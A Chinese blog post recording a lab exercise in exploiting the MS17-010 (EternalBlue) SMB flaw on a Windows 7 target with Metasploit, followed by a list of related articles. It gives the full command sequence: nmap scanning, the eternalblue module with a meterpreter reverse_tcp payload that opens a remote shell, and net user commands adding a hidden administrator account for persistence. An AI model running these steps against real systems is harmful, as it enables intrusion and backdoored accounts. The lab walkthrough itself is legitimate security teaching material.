使用MSF Console实现MS17-010漏洞利用

最新推荐文章于 2024-04-22 17:09:59 发布
最新推荐文章于 2024-04-22 17:09:59 发布
阅读量1.4k 收藏 11
点赞数 1
文章标签: 安全漏洞 安全 微软 metasploit 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WZZ_2363173126/article/details/115314817
版权

实验内容

       使用Kali的Metasploit Framework Console(MSF Console)工具实现Windows 7 Professional下MS17-010(永恒之蓝)漏洞利用。

实验设备

  • 目标主机:Windows 7 Professional SP1
  • 攻击主机:Linux version 5.10.0-Kali5-amd64

实验过程记录

信息收集

获取攻击主机IP和局域网网段

       使用ifconfig命令获取攻击主机IP和局域网网段。

ifconfig

ifconfig
       得知局域网网段为192.168.182.0/24

扫描局域网段,获取目标主机IP

       使用以下命令扫描局域网段,获取目标主机IP。

nmap -sS -Pn 192.168.182.0/24

nmap -sS -Pn 192.168.182.0/24
       观察到192.168.182.133开放了较多端口,确定其为目标主机。

端口扫描以及查看目标主机操作系统信息

       使用以下命令进行端口扫描并查看目标主机操作系统信息。

nmap -A 192.168.182.133

查看目标主机操作系统信息
       观察到目标主机操作系统为Windows 7 Professional SP1。

漏洞扫描

       使用以下命令进行漏洞信息扫描。

nmap -P0 --script=smb-vuln-* 192.168.182.133

漏洞扫描
       发现目标主机存在高危漏洞MS17-010(永恒之蓝)漏洞。

漏洞利用

       漏洞利用使用到了Kali Linux平台下的工具Metasploit Framework Console(MSF Console)。使用以下命令打开Metasploit Framework Console工具。

sudo msfconsole

打开Metasploit Console工具

查找并选用Exploit和Payload

       使用以下命令查找并选用Exploit和payload。此处,我们使用了一个反弹TCP(reverse_tcp)的攻击荷载。

search 17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp

查找并选用Exploit

设置参数

       使用show options命令可以查看攻击实现所需的参数。
       观察到LHOST和RHOST为所需参数,使用以下命令设置参数。

set lhost 192.168.182.131
set rhost 192.168.182.133

在这里插入图片描述

运行Exploit

       使用以下命令运行Exploit。

run

运行Exploit
       观察到返回到meterpreter会话,说明攻击成功。

权限提升与权限维持

       使用getuid命令观察系统权限,发现当前已经拿到System权限,并不需要提权了。
       拿到System权限就可以很容易地进行后续的权限维持了(例如上传木马、添加管理员等)。
权限维持与权限提升

添加隐藏管理员用户

net user root$ root /add
net localgroup administrators root$ /add

添加隐藏管理员用户

Dennis F
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
计算机病毒与防护:windows系统漏洞ms利用.ppt
06-10
MS17-010漏洞利用实验拓扑 MS17-010漏洞利用 msf > search ms17-010 msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp ...
Metasploit(MSF)使用教程(以ms17_010永恒之蓝为例)
天乐的博客
03-12 1070
Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012和Windows Server 2016等,利用SMB协议(特别是SMBv1)的漏洞,需要目标系统开放了139或445端口。到此本文就结束了,本文仅介绍Metasploit的简单入门,更多功能自行学习探索,相信你会掌握这一款强大的渗透测试扫描神器,禁止非法扫描,后果自负。1.启动kali的nmap,探测一下靶标的455端口开放情况。
kali初讲——Metasploit攻击ms17_010复现
萌蠢骇客
06-14 1624
Kali初讲——ms17_010漏洞,永恒之蓝复现
记录一次体验kali渗透工具MSF以及msfconsole命令详解
最新发布
ch_ycc的博客
04-22 1822
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用
Metasploit永恒之蓝[ms17_010]Windows7渗透实验
EnerY3的博客
11-16 293
永恒之蓝是一种计算机网络安全漏洞。它主要影响Windows操作系统,包括本次的实验对象Windows7。[ms17_010]:windows2017年的第10号漏洞。
ms17_010(永恒之蓝)漏洞复现详细教程
zxcvbnmasdflzl的博客
06-25 554
set payload windows/x64/meterpreter/reverse_tcp //设置攻击载体(简单来说就是,如果不使用这个模块,攻击成功之后,就是一个简单的shell,使用这个载体,攻击成功之后可以使用这个模块自带的各种攻击模块(强大到想流泪的功能模块))。首先使用 nmap 命令扫描局域网内的所有主机(因为ms17_010漏洞的最基本要求是需要开启445端口),这里使用nmap的最基本的扫描,直接命令后跟ip,nmap 192.168.1.1/24(扫描整个局域网的意思)。
永恒之蓝漏洞 ms17_010 详解
qq_45953122的博客
10-25 4485
永恒之蓝(ms17-010)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
msfconsole使用,MSF17-010(虚拟机)的实验
weixin_52371314的博客
03-16 929
宿主机kali:IP地址靶机win7:IP地址然后关闭靶机防火墙,将kali,和win7的网络模式更改为NAT模式,然后使用宿主机和靶机ping对方的机器,保证ping通.
MS17-010(永恒之蓝)漏洞分析与复现
热门推荐
未完成的歌~的博客
03-12 6万+
文章目录一、漏洞简介1、永恒之蓝介绍:2、漏洞原理:3、影响版本:二、漏洞复现复现环境:复现过程:1、主机发现:2、使用MSF的永恒之蓝漏洞模块3、使用ms17-010扫描模块,对靶机进行扫描:4、使用ms17-010攻击模块,对靶机进行攻击5、得到靶机shell6、通过shell对靶机进行控制 一、漏洞简介 1、永恒之蓝介绍: 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露
漏洞复现之(MS17-010
weixin_56513549的博客
11-02 2795
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。
ms17-010】永恒之蓝漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1690
因为只要掌握MSF使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用
msfms17-010永恒之蓝漏洞
AI_SumSky的博客
06-27 6839
**** 1.熟悉msf的基本用法。 2.熟悉一些渗透中会用到基本的windows命令。 3.复现永恒之蓝漏洞。通过向Windows服务器的SMBv1服务发送精心构造的命令造成溢出,最终导致任意命令的执行。在Windows操作系统中,SMB服务默认是开启的,监听端口默认为445,因此该漏洞造成的影响极大。**** 1.打开MSF默认已经集成了MS17-010漏洞的测试模块 利用search语法查找ms17-010 2.探测主机是否存在漏洞,利用use命令选择第三个测试接口,可探查主机是否存在永恒之蓝漏洞
CVE-2018-2883漏洞利用程序msf
03-27
CVE-2018-2883漏洞利用程序
CVE-2018-8174-msf:CVE-2018-8174-VBScript内存损坏漏洞利用
05-17
CVE-2018-8174-MSF 这是一个metasploit模块,该模块创建恶意的Word文档以利用CVE-2018-8174-VBScript内存损坏漏洞。 该模块是一个非常快速的端口,并使用在野外发现的漏洞利用示例。 该漏洞仅适用于32位Microsoft ...
MS08-067漏洞攻击全程演示(图解).
04-28
MS08-067漏洞攻击全程演示(图解)
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
MS17-010(Eternal blue永恒之蓝)木马持久化+后渗透+修复
m0_73135216的博客
09-12 630
MS17-010(Eternal blue永恒之蓝)木马持久化+后渗透+修复
永恒之蓝漏洞ms17-010
weixin_65336001的博客
05-01 1522
什么是永恒之蓝漏洞?利用ms17-010漏洞攻击Windows7复现超细教程
ms17-010(永恒之蓝) 漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
ms17-010漏洞复现
10-22
ms17-010漏洞是指微软Windows操作系统中的一个漏洞,黑客可以利用该漏洞远程执行代码,控制受感染的计算机。下面是ms17-010漏洞的复现过程: 1. 使用nmap进行探测,发现开启445端口,该端口可能会存在MS17-010漏洞。 2. 使用MSF的永恒之蓝漏洞模块。 3. 使用ms17-010扫描模块,对靶机进行扫描。 4. 使用ms17-010攻击模块,对靶机进行攻击。 5. 得到靶机shell。 6. 通过shell对靶机进行控制。 需要注意的是,复现过程仅供学习和研究使用,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值